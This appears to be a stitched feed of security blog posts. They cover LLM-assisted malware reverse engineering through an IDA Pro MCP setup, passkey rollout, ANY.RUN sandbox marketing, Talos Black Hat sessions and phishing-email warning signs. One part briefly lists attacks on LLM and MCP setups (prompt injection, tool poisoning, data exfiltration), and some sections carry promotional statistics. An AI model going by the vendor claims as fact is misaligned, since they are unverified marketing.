Time                 18m 0s     4m 0s      11m 24s    22m 34s    18m 01s    46m 08s
Tasks executed       161        30         328        28         25         106
Functions analyzed   13         1          20         4          4          30

(* This prompt had to be executed multiple times until all functions were analyzed)  

Based on this data, there are a few results to highlight: 

  • The cost associated with a cloud-based service could be high depending on the size of the file being analyzed. An optimized prompt and a pre-plan for how to query the model may help reduce this cost. 
  • A local model may take much longer to finish the job depending on the hardware and how big the analyzed file is. Reducing the scope of the analysis, the size of the prompt, and the context window may let the model use more GPU and reduce this time. For this test, the context window was limited to 100,000 tokens, which resulted in a 60%/40% CPU/GPU usage split (see the configuration sketch after this list). Smaller context windows caused too many hallucinations due to truncated context, and bigger context windows caused too much CPU to be used, which increased query times several-fold. 
  • The cloud-based model executed many more tasks than the local model, which means it was more thorough in analyzing the sample. This is clear when you see the results below where the code is much better documented, and the resulting analysis is much closer to the expected result. This is expected since the cloud model has access to a much bigger input context than the local model. This lack of context sometimes caused the local model to “forget” the instructions and stop halfway through the analysis.  
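
For those reproducing this setup, one way to pin the context window in Ollama is a custom Modelfile; num_ctx is Ollama’s context-length parameter, and the model tag matches the one used in our tests:

FROM devstral:24b
PARAMETER num_ctx 100000

Building and using it is then a matter of running “ollama create devstral-100k -f Modelfile” and pointing the MCP client at the devstral-100k model.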

Comparing the results: Human vs. cloud-based LLM vs. local LLM 

We performed the test by running each prompt through a clean IDA database without prior human analysis. For the local model, each prompt was executed as a separate task, without keeping context from the previous prompt due to the limitation in the context window size. The cloud-based test was done as a single sequential task; that is, each prompt was sent in the same chat window as the previous one to retain context from previous analyses. 

The results were then compared to the same sample populated with Lumina data, which contains human-made analyses for each function. Figure 5 details the results, where each line represents the same function in all three tests: 

Figure 5. Comparison between human-made analyses and LLM results in renaming functions according to their behavior. 

By looking at the function names and comparing them to human analysis, both models got close to the expected results. Remember that the models had no context about the type of file and whether or not it was malicious before starting the analysis.  

In some cases, we can even see the cloud-based model providing more context in the function name than the human-made analysis, like “VIBE_CountRunningProcesses” and “VIBE_ModifyPEFileHeaderAndChecksum”.  

The difference in efficiency between the local LLM and cloud-based LLM gets clearer when examining the documented code. The instructions we gave in the prompts requested that the LLM execute these tasks while analyzing the code: 

  • “Rename variables and function parameters to more sensible names.” 
  • “Change the variable and argument types if necessary.” 
  • “Inspect the decompilation and add comments with your findings to important areas of code.” 
  • “If you encounter Windows API calls, document by adding comments to the code what the API call does and what parameters it accepts”.  

Looking at the results for the function responsible for making the HTTP requests to the server, the local LLM performs some of these tasks, although not thoroughly renaming all variables: 

Figure 6. Sample function documented by the local LLM showing some variables not renamed as expected. 

The comment at the start of the function is very basic and not all variables were renamed, with many still using the default template name generated by the IDA Pro decompiler like “v15”, “v28” or “v25”.  

The Windows API call comments are also very simple, with a basic description of what the function is used for and a list of parameters and types it accepts.  

There are also tangible differences in the function analysis performed by the cloud-based and the local LLM solution. 

Figure 7. The same function used in the previous example, now documented by the cloud-based LLM, with results closer to what was expected. 

The code is much clearer, with the variables renamed to more sensible names, while the comments are much more insightful, describing the actual behavior of the function. We also saw that the cloud-based model added comments to more lines of code than the local model did. 

Based on the above, we can see that the use of LLMs with MCP servers can be very helpful in assisting the analyst in understanding unknown code and improving the reverse engineering of malicious files. 

The capability to quickly analyze all binary functions and rename them to sensible names could help speed up analysis, as it gives more context to the disassembled or decompiled code while the analyst focuses on more complex pieces of code or obfuscation.  

Known issues and limitations 

Using any kind of automated tool in malware analysis has its issues, and users must take proper precautions, as is true for anything involving computer security. This approach also has limitations that may prevent it from being widely adopted, such as: 

  • Usage cost: The use of language models is usually associated with a high cost per token input by the user or generated by the model. When analyzing complex malware with hundreds of functions, this cost can compound quickly and make the approach impractical as a solution. This is especially problematic with the use of MCP tools, since they add their own content, with instructions on how to use the tools, to the user prompt. They also include any text extracted from the analysis, like strings and disassembly/decompilation listings, and when all of this is put together, a simple query can cost several hundred thousand tokens. 
  • Time overhead: The analyst using these tools needs to consider not only the time taken waiting for a response, but also the time taken creating the most efficient prompts to maximize results while reducing costs. A local model may reduce costs but also add considerable time to output results. 
  • Malicious tools: Since MCP servers are a somewhat recent technology used in a field that moves very fast, there is a proliferation of tools and applications available to users looking to use LLMs in their work. There is a variety of MCP clients and as many marketplaces where people can upload their MCP servers for anyone to use. Users need to carefully consider which tools they are using, as these applications may intentionally or unintentionally contain malicious code, which may compromise the researchers using them.  
  • Vulnerabilities: As is true with other computer applications, MCP protocol and LLMs have attack surfaces that can be exploited in many ways to compromise the data being generated or the actual user’s machine. Prompt injection, MCP tool poisoning, tool privilege abuse and other techniques may be used to compromise the generated data, exfiltrate sensitive data, expose confidential code or tokens and even execute code remotely. 

IDA Pro MCP server installation 

Now that we’ve seen how useful a local model can be in helping the analyst perform reverse engineering on malicious files, let’s learn how to set up the environment.  

The process of installing and configuring an MCP server to use with your disassembler may vary depending on the software stack you plan to use, but to give readers an idea of how the process works and discuss some caveats that may impact the results, we will review the installation of an MCP server integrated with IDA Pro. The process will be very similar if you’re using different versions, as well as if you prefer to use Ghidra instead of IDA Pro. 

A good tutorial on how to install and configure an MCP server for the Ghidra disassembler is available on LaurieWired’s GitHub. The process described on their page is very similar to what is shown here. 

Install Ollama local LLM 

Installing Ollama is straightforward using the installer provided on their website. Once installed, you may download the model you plan to use with the following command. In this case we are using Devstral: 

ollama pull devstral:latest

Once the model is downloaded, you may run Ollama in server mode using the command “ollama serve”. At any point after the server is running, you can use the command “ollama ps” to list information about the running model, including the loaded model and the CPU and GPU memory it is currently using. This information is useful for understanding how your choice of model and context will affect performance, as explained previously. 

Using LLMs as a reverse engineering sidekick
Figure 8. Example of processor and GPU usage by the local LLM during processing of one of the prompts shown before. 

Note: If the machine running Ollama is not the same machine where you will run the MCP server and IDA, you may need to enable Ollama to listen for connections on any network interface, since by default it only listens on the localhost interface. To do that, you need to create a system-wide environment variable: 

OLLAMA_HOST=0.0.0.0:9999 

This example tells Ollama to listen on any interface and use port 9999 for the server. You need to ensure this port is accessible from the machine running the MCP client for this to work. 
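
For example, the variable can be set with standard OS mechanisms (nothing Ollama-specific beyond the variable name):

export OLLAMA_HOST=0.0.0.0:9999      # Linux/macOS, e.g., in the shell profile
setx OLLAMA_HOST "0.0.0.0:9999"      # Windows; applies to new sessions after Ollama restarts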

Install MCP Server and MCP IDA Pro plugin 

Installing Mrexodia’s MCP Server is also pretty simple, but there’s an important step that needs to be completed before starting the installation if you’re using IDA Pro. The server requires Python 3.11 and installs several Python modules to work. These modules need to be accessible from the Python environment inside IDA Pro, which by default comes with its own Python installation. To make sure IDA Pro and the MCP server are using the same version, you need to ensure IDA is using the same Python version you have on your default path.  

This is done using a tool available in the IDA Pro installation folder. In our case, we are using IDA Pro 8.5, so the tool is located at “C:\Program Files\IDA Pro 8.5\idapyswitch.exe”. Running the tool will give you a list of currently installed Python versions and let you choose the one IDA will use: 

Using LLMs as a reverse engineering sidekick
Figure 9. Example usage of the idapyswitch tool to choose the correct Python version to use in IDA.

Once IDA is using the same Python version needed by the MCP Server, you can install the server following the process from their Github page: 

pip uninstall ida-pro-mcp
pip install git+https://github.com/mrexodia/ida-pro-mcp
ida-pro-mcp --install

This will install the required modules and copy the IDA Pro plugin to its proper location. The final step is to run the MCP server. This step is necessary if you’re using Cline or Roo Code inside VSCode, as these tools don’t work well with the server being launched directly by the client. To run the MCP server, use the command in Figure 10 and ensure the terminal where it is running stays open for the duration of your analysis session. 

Using LLMs as a reverse engineering sidekick
Figure 10. Example command to run the MCP server from command line. 

The next step is to ensure the MCP plugin is working and running inside IDA. Once you have a file open in the disassembler, you can start the MCP plugin component by going to “Edit->Plugins->MCP” or using the hotkey “Control+Alt+M.” You should see a message informing you the server started successfully in the IDA output window. 

Using LLMs as a reverse engineering sidekick
Figure 11. Message showing the successful start of the MCP plugin in IDA.

 Install and configure MCP client 

The last step is to install the MCP client, which will work as a connector to all other components. The installation process will vary depending on which tools you choose, but in this case, we will use VSCode with the Cline extension. In VSCode, go to the Extensions Marketplace and search for Cline. Click on the Install button and wait for the installation to finish. 

A new tab will appear in the left tab menu with the Cline extension icon. This interface is how you are going to interact with the IDA Pro MCP Server and the LLM. 

Figure 12. Cline extension main interface. 

Clicking on the gear icon in the top-right menu takes you to the Configuration page, where you must configure the LLM model you’re using. Once you choose the API provider, you need to configure at least the base URL and model name; cloud-based models will require an API key as well. The settings in Figure 13 are for a local model running on Ollama. 

Figure 13. Cline extension LLM configuration page.

The next step is to configure the MCP server in Cline. This is how Cline knows which servers are available and what tools each server provides. These settings are found behind the three-bar icon in the top-right menu. 

The MCP server can be configured in the “Remote Servers” tab, or you can directly edit the configuration file. The example in Figure 14 shows both options to configure the MCP server we set up in the previous step: 

Figure 14. Cline extension MCP server configuration. 
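As a rough illustration of the configuration-file route, the entry usually boils down to a small JSON block in Cline’s MCP settings. The server name, URL, and port below are placeholders, and the exact keys may vary between Cline versions, so treat Figure 14 as authoritative: 

{
  "mcpServers": {
    "ida-pro-mcp": {
      "url": "http://127.0.0.1:8744/sse"
    }
  }
}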

Once this is done, you should see something similar to Figure 15 on your “Installed” tab, indicating that Cline is able to talk to the MCP Server and the IDA Pro plugin. 

Figure 15. MCP server list of available tools.

Now that everything is set up, you can begin using the Cline chat window to query the currently open IDA Pro database and perform analysis. 

Coverage 

Ways our customers can detect and block this threat are listed below. 


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent, and secure access to the internet, cloud services, or private applications, no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context for your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Snort SIDs for the threats are:  

  • Snort2: 58835 
  • Snort3: 300262 

ClamAV detections are also available for this threat:  

  • Win.Keylogger.Tedy-9955310-0 

Cisco Talos Blog – ​Read More

Passkey support in business applications | Kaspersky official blog

Transition to passkeys promises organizations a cost-effective path toward robust employee authentication, increased productivity, and regulatory compliance. We’ve already covered all the pros and cons of this business solution in a separate, in-depth article. However, the success of the transition — and even its feasibility — really hinges on the technical details and implementation specifics across numerous corporate systems.

Passkey support in identity management systems

Before tackling organizational hurdles and drafting policies, you’ll have to determine if your core IT systems are ready for the switch to passkeys.

Microsoft Entra ID (Azure AD) fully supports passkeys, letting admins set them as the primary sign-in method. For hybrid deployments with on-premises resources, Entra ID can generate Kerberos tickets (TGTs), which your Active Directory domain controller can then process.

However, Microsoft doesn’t yet offer native passkey support for RDP, VDI, or on-premises-only AD sign-ins. That said, with a few workarounds, organizations can store passkeys on a hardware token like a YubiKey. This kind of token can simultaneously support both the traditional PIV (smart cards) technology and FIDO2 (passkeys). There are also third-party solutions for these scenarios, but you’ll need to evaluate how using them impacts your overall security posture and regulatory compliance.

Good news for Google Workspace and Google Cloud users: they offer full passkey support.

Popular identity management systems like Okta, Ping, Cisco Duo, and RSA IDplus also support FIDO2 and all major forms of passkeys.

Passkey support on client devices

We have a detailed post on the subject. All modern operating systems from Google, Apple, and Microsoft support passkeys. However, if your company uses Linux, you’ll likely need extra tools, and overall support is still limited.

Also, while for all major operating systems it might look like full support on the surface, there’s a lot of variety in how passkeys are stored, and that can lead to compatibility headaches. Combinations of several systems like Windows computers and Android smartphones are the most problematic. You might create a passkey on one device and then find you can’t access it on another. For companies with a strictly managed device fleet, there are a couple of ways to tackle this. For example, you could have employees generate a separate passkey for each company device they use. This means a bit more initial setup: employees will need to go through the same process of creating a passkey on every device. However, once that’s done, signing in takes minimal time. Plus, if they lose one device, they won’t be completely locked out of their work data.

Another option is to use a company-approved password manager to store and sync passkeys across all employees’ devices. This is also a must for companies using Linux computers, as Linux can’t natively store passkeys. Just a heads-up: this approach might add some complexity when it comes to regulatory compliance audits.

If you’re looking for a solution with almost no issues with sync and multiple platforms, hardware passkeys like the YubiKey are the way to go. The catch is that they can be significantly more expensive to deploy and manage.

Passkey support in business applications

The ideal scenario for bringing passkeys into your business apps is to have all your applications sign in through single sign-on (SSO). That way, you only need to implement passkey support in your corporate SSO solution, such as Entra ID or Okta. However, if some of your critical business applications don’t support SSO, or if that support isn’t part of your contract (which, unfortunately, happens), you’ll have to issue individual passkeys for users to sign in to each separate system. Hardware tokens can store anywhere from 25 to 100 passkeys, so your main extra cost here would be on the administrative side.

Popular business systems that fully support passkeys include Adobe Creative Cloud, AWS, GitHub, Google Workspace, HubSpot, Office 365, Salesforce, and Zoho. Some SAP systems also support passkeys.

Employee readiness

Rolling out passkeys means getting your team up to speed regardless of the scenario. You don’t want them scratching their heads trying to figure out new interfaces. The goal is for everyone to feel confident using passkeys on every single device. Here are the key things your employees will need to understand.

  • Why passkeys beat passwords (they’re much more secure, faster to sign in with, and don’t need to be rotated)
  • How biometrics work with passkeys (the biometric data never leaves the device, and isn’t stored or processed by the employer)
  • How to get their very first passkey (for example, Microsoft has a Temporary Access Pass feature, and third-party IAM systems often send an onboarding link; the process needs to be thoroughly documented, though)
  • What to do if their device doesn’t recognize their passkey
  • What to do if they lose a device (sign in from another device that has its own passkey, or use an OTP, perhaps given to them in a sealed envelope for just such an emergency)
  • How to sign in to work systems from other computers (if the company’s policies permit it)
  • What a passkey-related phishing attempt might look like

Passkeys are no silver bullet

Moving to passkeys doesn’t mean your cybersecurity team can just cross identity threats off their risk list. Sure, it makes things tougher for attackers, but they can still do the following:

  • Target systems that haven’t switched to passkeys
  • Go after systems that still have fallback login methods like passwords and OTPs
  • Steal authentication tokens from devices infected with infostealers
  • Use special techniques to bypass passkey protections

While it’s impossible to phish the passkey itself, attackers can set up fake web infrastructure to trick a victim into authenticating and validating a malicious session on a corporate service.

A recent example of this kind of AiTM attack was documented in the U.S. The victim was lured to a fake authentication page for a corporate service, where attackers first phished the username and password, and then the session confirmation by having the victim scan a QR code. In that incident, the security policies were configured correctly, so scanning the QR code did not result in successful authentication. But because such cross-device passkey mechanisms exist, attackers count on finding deployments where they are misconfigured, and where the physical proximity of the authenticating device to the device storing the key is never checked.

Ultimately, switching to passkeys requires detailed policy configuration. This includes both authentication policies (such as disabling passwords when a passkey is available, or banning physical tokens from unknown vendors) and monitoring policies (such as logging passkey registrations or cross-device scenarios from suspicious locations).

Kaspersky official blog – ​Read More

CISO Blueprint: 5 Steps to Enterprise Cyber Threat Resilience 

Why are SOC teams still struggling to keep up despite heavy investments in security tools? False positives pile up, evasive threats slip through, and critical alerts often get buried under noise. For CISOs, the challenge is giving teams the visibility and speed they need to respond before damage is done. 

ANY.RUN helps close that gap. 95% of companies using the solution report faster investigations and shorter response times because their teams aren’t waiting on static reports or incomplete data. Instead, they get real-time insight into how threats behave, enabling faster decisions, fewer delays, and a measurable boost in SOC performance. 

This CISO blueprint outlines five strategic steps to help your enterprise SOC reach new levels of resilience with proven results. 

Proven Results from the Front Lines of the SOC 

Security leaders are seeing real operational gains after integrating ANY.RUN into their workflows. 

🏆 Key ANY.RUN stats
  • 90% of companies report higher detection rates after adopting ANY.RUN
  • SOC teams improve performance by up to 3x
  • 74% of Fortune 100 companies rely on ANY.RUN in their security operations
  • Trusted by 15,000+ organizations across finance, telecom, retail, government, and healthcare

Take Expertware, for example, a leading European IT consultancy. Facing growing pressure to shorten investigation timelines and scale without hiring, they adopted ANY.RUN’s sandbox. What used to take hours of manual work now happens in minutes thanks to real-time, interactive malware analysis. 

What changed after implementing ANY.RUN’s sandbox? 

  • 50% reduction in malware investigation time 
  • Improved team collaboration, with shared reports and interactive analysis reducing handoff delays 
  • Deeper threat visibility, including multi-stage and fileless malware 
  • Faster client response, with clearer reports enabling quicker decision-making 

ANY.RUN helped them eliminate the overhead of manual setups while improving threat clarity, leading to stronger security outcomes for both their team and their clients. 

1. Deploy Real-Time Threat Analysis for Early Detection

When time is everything, waiting on static scans or post-execution reports just doesn’t cut it. To respond effectively, SOCs need a clear view of the threat as it happens. 

ANY.RUN’s sandbox delivers that clarity through live detonation, giving your team an immediate look at the full scope of any malware or phishing attack. From execution flow to network connections and dropped payloads, everything is visible in real time. 

Phishing attack analyzed inside ANY.RUN sandbox 

What sets ANY.RUN sandbox apart is interactivity. Analysts can engage with the sample mid-execution, clicking buttons, opening files, entering credentials, just like a real user. That means no waiting for analysis to complete and no relying on partial data. Threat behavior becomes obvious in seconds, allowing your team to move faster and with greater confidence. 

Integrate ANY.RUN’s Interactive Sandbox in your SOC
Automate threat analysis, cut MTTD, & boost detection rate 



Contact us


2. Automate Triage to Reduce Analyst Workload and Alert Fatigue 

Not all threats reveal themselves with a simple scan. Many phishing kits and malware samples are designed to evade detection unless specific user actions are taken, like solving a CAPTCHA, clicking a hidden button, or opening a malicious link embedded in a QR code. 

View real case with QR code analysis 

QR code analyzed and malicious URL opened in a browser automatically by ANY.RUN 

ANY.RUN tackles this head-on. With Automated Interactivity, available in the Enterprise plan, it simulates real user behavior, solving CAPTCHAs, navigating redirects, opening files and links hidden inside QR codes or archives. This allows the sandbox to detonate even evasive threats automatically, giving your team faster, more accurate results with less manual effort. 

See a video recording of the analysis performed by Automated Interactivity

The outcome? 

  • Higher detection rates 
  • Faster triage 
  • Reduced alert fatigue 
  • More time to focus on high-impact threats 

This type of automation also lowers the pressure on junior analysts, who can now complete complex investigations without relying on senior teammates to step in. With ANY.RUN handling the hard parts of triage, your team detects threats faster and stays focused on response, not troubleshooting. 

3. Boost SOC Performance through Collaboration and a Unified Security Stack 

Tools alone won’t fix slow investigations or fragmented response workflows; collaboration is just as critical. 

ANY.RUN is built to support this from the ground up. Designed for high-performing SOCs, its Teamwork feature gives analysts a shared workspace where roles are clearly defined, tasks are tracked in real time, and managers can supervise without disrupting the flow. Whether your team is in one office or spread across time zones, everyone stays aligned and productive. 

  • Clear task ownership to prevent duplication and confusion 
  • Role-based access and oversight for team leads 
  • Scalable structure that grows with your team 
  • Built-in activity tracking to monitor productivity 

Team management displayed inside ANY.RUN sandbox 

And it doesn’t stop there. ANY.RUN integrates seamlessly with your existing SOAR, XDR, or SIEM platforms, allowing teams to analyze suspicious files straight from alerts, enrich incidents with fresh IOCs, and manage security workflows without leaving their familiar interfaces.  

You can set up integration with other security vendors with ease  

One of the latest integrations is with IBM QRadar SOAR, a widely used platform for incident response. With ANY.RUN’s official app, teams can: 

  • Launch sandbox analyses directly from SOAR playbooks 
  • Enrich cases with real-time IOCs and behavioral insights 
  • Automate repetitive steps to reduce Mean Time to Respond (MTTR) 

Setup takes just minutes; plug in your API key, and your team is ready to go. 

ANY.RUN app for IBM QRadar SOAR 

Together, this connected and collaborative approach leads to faster decisions, higher output, and a stronger, more efficient SOC. 

4. Ensure Privacy and Compliance to Prevent Data Leaks 

Threat detection means little if it compromises sensitive data in the process. For CISOs, building a resilient security program also means ensuring that investigations don’t create new risks, like exposing internal files, violating client confidentiality, or falling out of compliance. 

ANY.RUN addresses this risk with robust privacy controls designed for enterprise SOCs. Teams can conduct investigations in a fully private sandbox, ensuring that no data is accidentally exposed or shared outside the organization. Role-based visibility settings let team leads define who sees what, while granular access controls prevent analysts from unintentionally publishing sensitive tasks. 

Manage privacy in your team settings 

You also get flexible private analysis options that scale with your team: 

  • Unlimited private analyses per user 
  • Or unlimited users with per-analysis pricing 

This means your investigations stay confidential without compromising collaboration or growth. 

To further tighten access and simplify security management, ANY.RUN supports Single Sign-On (SSO). Analysts can log in using existing organizational credentials, improving both security and ease of use. Onboarding, offboarding, and daily access become seamless, reducing risk and helping you stay compliant with internal policies and external standards. 

5. Move From Reactive to Proactive Security 

Staying ahead of modern threats demands proactive insight into what’s coming next. But for many CISOs, building that foresight into daily workflows is still a challenge. With queues overflowing and teams focused on triage, opportunities to uncover patterns, enrich investigations, and harden defenses often slip through the cracks. 

That’s where ANY.RUN’s Threat Intelligence Lookup (TI Lookup) delivers a clear advantage. 

TI Lookup gives access to an extensive database of the latest IOCs, IOBs, and IOAs 

TI Lookup gives your SOC team instant access to threat data sourced from millions of malware detonation sessions, with real-world samples, IOCs, IOBs, IOAs, and TTPs updated within hours of an attack, not days or weeks later. It’s built to accelerate investigation, support informed decisions, and drive proactive defense across your infrastructure. 

With free access, your team can: 

  • Enrich alerts with context from recent sandbox sessions 
  • Link artifacts to real-world malware campaigns targeting over 15,000 companies globally 
  • Reduce MTTR by quickly identifying behaviors, payloads, and known threat families 
  • Gather intelligence to improve SIEM, IDS/IPS, or EDR rule creation 

Get instant threat context with TI Lookup
Act faster. Slash MTTR. Stop breaches early 



Try now. It’s free!


Build a Smarter, More Resilient SOC Starting Now 

Resilience is built with visibility, automation, and collaboration that work together across your entire SOC. From accelerating detection to reducing manual workload, ANY.RUN gives security teams the tools they need to respond faster, dig deeper, and stay ahead of evolving threats. 

Whether you’re modernizing your stack or scaling operations, a live, interactive sandbox can be the force multiplier your team needs. 

Ready to see how it fits into your environment? 
Contact us for integration and start strengthening your threat response with speed and precision. 

About ANY.RUN 

ANY.RUN is built to help security teams detect threats faster and respond with greater confidence. Our interactive sandbox platform delivers real-time malware analysis and threat intelligence, giving analysts the clarity they need when it matters most. 

With support for Windows, Linux, and Android environments, our cloud-based sandbox enables deep behavioral analysis without the need for complex setup. Paired with Threat Intelligence Lookup and Feeds, ANY.RUN provides rich context, actionable IOCs, and automation-ready outputs, all with zero infrastructure burden. 

Start your 14-day trial now → 

The post CISO Blueprint: 5 Steps to Enterprise Cyber Threat Resilience  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Cisco Talos at Black Hat 2025: Briefings, booth talks and what to expect

Cisco Talos at Black Hat 2025: Briefings, booth talks and what to expect

Cisco Talos is back at Black Hat with new research, threat detection overviews and opportunities to connect with our team. Whether you’re interested in what we’re seeing in the threat landscape, detection engineering or real-world incident response, here’s where and how to find us: 

Visit us at the Cisco booth: 2726 

We’ll have short, 15-minute booth talks throughout Wednesday and Thursday of Black Hat, with topics including: 

  • Talos Vulnerability Discovery Year in Review 
  • How to: Threat Intel 
  • Full Metal SnortML: Accelerating Machine Learning based Firewalls with FPGAs 
  • From CVE to Detection: A Rule Writer’s Journey Through Modern Threats 

We also have these sessions as part of the wider conference agenda: 

Lunch & Learn: Backdoors & Breaches 

Lagoon KL, Level 2 | Wednesday, Aug 6, 12:05–1:30 PM  
Speaker: Joe Marshall 

Join Joe and members of Talos as we discuss and develop incident response plans in real-time. We’ll use real scenarios over a game of Backdoors & Breaches, an incident response card game developed by Black Hills Information Security. Members from Talos Threat Intelligence will lead tables through the game over lunch and discuss recent threat trends. 

Reserve your spot here 

Sponsored Session: Generative AI as a Lure, Tool and Weapon 

Mandalay Bay I | Wednesday, Aug 6, 11:20–12:10 PM  
Speaker: Nick Biasini 

Nick will explore how generative AI is shaping today’s threat landscape, from attackers using AI to enhance operations, to malware posing as AI tools, to efforts targeting the models themselves. The session will also cover how organizations can safely adopt GAI while defending against its misuse. 

Learn more here 

Threat Briefing: ReVault! Compromised by Your Secure SoC 

Oceanside C, Level 2 |  Wednesday, Aug 6, 10:20–11:00 AM 
Speaker: Philippe Laulheret 

This talk introduces ReVault, a vulnerability affecting a widely used embedded security chip. Philippe will demonstrate how a low-privilege user can exploit the flaw to extract sensitive data, gain persistence at the firmware level, and compromise the host system.  

Learn more here 

Visit the Splunk Booth: Threat Hunters Cookbook Launch 

Splunk Booth 3046

Our colleagues at Splunk will be launching their brand new Threat Hunters Cookbook in hard copy. We’ve had a sneak preview, and trust us, this is a brilliant resource for those who want to use modelling and machine learning to conduct threat hunts that really get the best out of your efforts.  

 

If you’re at the show, we’d love to hear what you’re working on, so stop by the Cisco booth (and grab yourself a Snorty while you’re at it). See you in Vegas! 

Cisco Talos Blog – ​Read More

What to do if you get a phishing email | Kaspersky official blog

Phishing emails typically end up in the spam folder because today’s security systems easily recognize most of them. However, these systems aren’t completely reliable: some phishing slips through to your inbox, while some bona fide messages land in the junk folder instead. This article explains how to detect phishing emails, and what to do about them.

Signs of phishing email

There are several markers that are widely believed to indicate a message sent by scammers. Below are some examples.

  • Catchy subject line. A phishing message will likely represent a fraction of all the mail landing in your inbox. This is why scammers usually try to make their subject lines stand out by using trigger words like “urgent”, “prize”, “cash”, “giveaway”, or similar, designed to prompt you to open the message as quickly as possible.
  • Call to action. You can bet the message will encourage you to do at least one of the following: click a link, pay for something you don’t really need, or check the details in an attachment. The attackers’ primary goal is to lure victims away from their email and into unsafe spaces where they’re tricked into spending money or surrendering access to their accounts.
  • Expiring timer. The message might feature a timer that says, “Follow this link. It expires in 24 hours.” All these tricks are just nonsense. Scammers want to rush you so you start to panic and stop thinking carefully about your money.
  • Mistakes in the email body. In the past year, there’s been an increase in phishing emails sent in multiple languages at once, often with some odd mistakes.
  • Suspicious sender address. If you live in, say, Brazil, and you get an email message from an Italian address, that’s a red flag and a good reason to completely ignore its contents.

An impersonal greeting like “Dear %username%” used to be a sure sign of a phishing email, but scammers have moved on from that. Targeted messages addressing the victim by name are becoming increasingly common. Ignore those too.

What to do if you get a phishing email

If you’ve managed to spot one using the signs described above, well done — you’re awesome! You can go ahead and delete it without even opening it. And if you want to do your good deed for the day, report the phishing attempt via Outlook or Gmail to make this world a tiny bit safer. We understand that spotting phishing in your email right away isn’t easy, so here’s a short list of don’ts to help with detection.

Don’t open attachments

Scammers can hide malware inside various types of email attachments: images, HTML files, and even voice messages. Here’s a recent example: you get an email with an attachment that appears to be a voice message with the SVG extension, but that’s typically an image format… To listen to the recording, you have to open the attachment, and what do you know — you find yourself on a phishing site that masquerades as Google Voice! And no, you don’t hear any audio. Instead, you’re redirected to another website where you’ll be prompted to enter the login and password for your email account. If you’re interested in learning more, here’s a Securelist blog post on this.

It seems that voice messages are sent more often through messengers than by email

This and other stories just go to show you shouldn’t open attachments. Any attachments. At all. Especially if you weren’t expecting the message in the first place.

Don’t open links

This is a golden rule that will help keep your money and accounts safe. A healthy dose of caution is exactly what everyone needs when using the internet. Let’s take a look at this phishing message.

An "exciting win-win", but only the scammers benefit

An “exciting win-win”, but only the scammers benefit

Does this look odd? It’s written in two languages: Russian and Dutch. It shows the return address of a language school in the Netherlands, yet it references the Russian online marketplace Ozon. The message body congratulates the recipient: “You are one of our few lucky clients who get a chance to compete for uncredible prizes.” “Competing for prizes” is easy: just click the link, which has been thoughtfully included twice.

A week later, another message landed in the same inbox. Again, it came in two languages: Italian and Russian. This one came from a real Italian email address associated with the archive of Giovanni Korompay‘s works. The artist passed away in 1988. No, this wasn’t an offer to commemorate the painter: most likely, hackers breached the archive’s email account and are now sending phishing mail about soccer betting from that source. All of that looks rather fishy.

Another email in two languages

These messages have a lot in common. One thing we didn’t mention is how phishing links are disguised. Scammers deliberately use the TinyURL link shortener to make links look as legitimate as possible. But the truth is, a link that starts with tinyurl.com could point to anything: from the Kaspersky Daily blog to something malicious.
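If you want to see where a shortened link leads without opening it, you can inspect the redirect target from a terminal. Here’s a minimal sketch using curl (the short link below is a made-up placeholder):

curl -sI https://tinyurl.com/example-link | grep -i "^location"

The Location header in the response reveals the real destination, letting you judge the link before clicking it.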

Don’t believe what’s written down

Scammers come up with all sorts of tricks: pretending to be Nigerian princes, sending fake Telegram Premium subscriptions, or congratulating people on winning fake giveaways. Every week, I get email with text like this: “Congratulations! You can claim your personal prize.” Sometimes they even add the amount of the supposed winnings to make sure I open the message. And once, I did.

The scammers were too lazy to shorten this link

Inside, it’s all by the book: a flashy headline, congratulations, and calls to click the link. To make it seem even more convincing, the email is supposedly signed by a representative from the “Prize Board of the Fund”. What fund? What prize board? And how could I possibly have won something I never even entered into? That part is unclear.

You may have noticed the unusual design of this message: it clearly stands out from the previous examples. To add credibility, the scammers used Google Forms, Google’s official service for surveys and polls. The scheme is a simple one: they create a survey, set it up to send response copies to the email addresses of their future victims, and collect their answers. Read Beware of Google Forms bearing crypto gifts to find out what happens if you open a link like that.

The bottom line

Following these rules will protect you from many — but not all — of the tricks that attackers might come up with. That’s why we recommend trusting a reliable solution: Kaspersky Premium. Every year, our products undergo testing by the independent Austrian organization AV-Comparatives to evaluate their ability to detect phishing threats. We described the testing procedure in a post a year ago. In June 2025, Kaspersky Premium for Windows successfully met the certification criteria again and received the Approved certificate, a mark of quality in protecting users from phishing.

Important clarification: at Kaspersky, we use a unified stack of security technologies, which is what the experts tested. This means the Kaspersky Premium for Windows award also applies to our other products for home users (Kaspersky Standard, Kaspersky Plus, and Kaspersky Premium) and for businesses (such as Kaspersky Endpoint Security for Business and Kaspersky Small Office Security).


Kaspersky official blog – ​Read More

Major Cyber Attacks in July 2025: Obfuscated .LNK‑Delivered DeerStealer, Fake 7‑Zip, and More

While cybercriminals were working overtime this July, so were we at ANY.RUN — and, dare we say, with better results. As always, we’ve picked the most dangerous and intriguing attacks of the month. But this time, there’s more. 

